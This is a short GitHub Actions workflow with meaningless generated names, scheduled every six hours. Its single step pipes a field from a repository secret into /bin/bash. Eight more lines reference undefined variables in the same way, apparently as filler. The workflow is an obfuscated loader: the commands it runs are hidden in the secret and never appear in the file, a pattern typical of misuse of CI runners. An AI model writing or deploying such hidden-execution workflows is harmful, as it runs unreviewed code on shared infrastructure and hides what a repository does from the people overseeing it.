name: wuhaoning3214
on:
  workflow_dispatch:
  schedule:
    - cron: '4 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wuhaoning3214
        env:
          kzrjn466: ${{ secrets.kzrjn466 }}
        run: |
          echo $kzrjn466 | jq -r .t4801 | /bin/bash
          echo $gayg336 | jq -r .sq3 | /bin/bash
          echo $jljnf3571 | jq -r .pxab38018 | /bin/bash
          echo $ah6 | jq -r .ldy222 | /bin/bash
          echo $ixmbs00 | jq -r .h74 | /bin/bash
          echo $jwx8 | jq -r .ir0402 | /bin/bash
          echo $zy0 | jq -r .auy9090 | /bin/bash
          echo $utgov6607 | jq -r .pxkot18528 | /bin/bash
          echo $psvre9435 | jq -r .qh81173 | /bin/bash

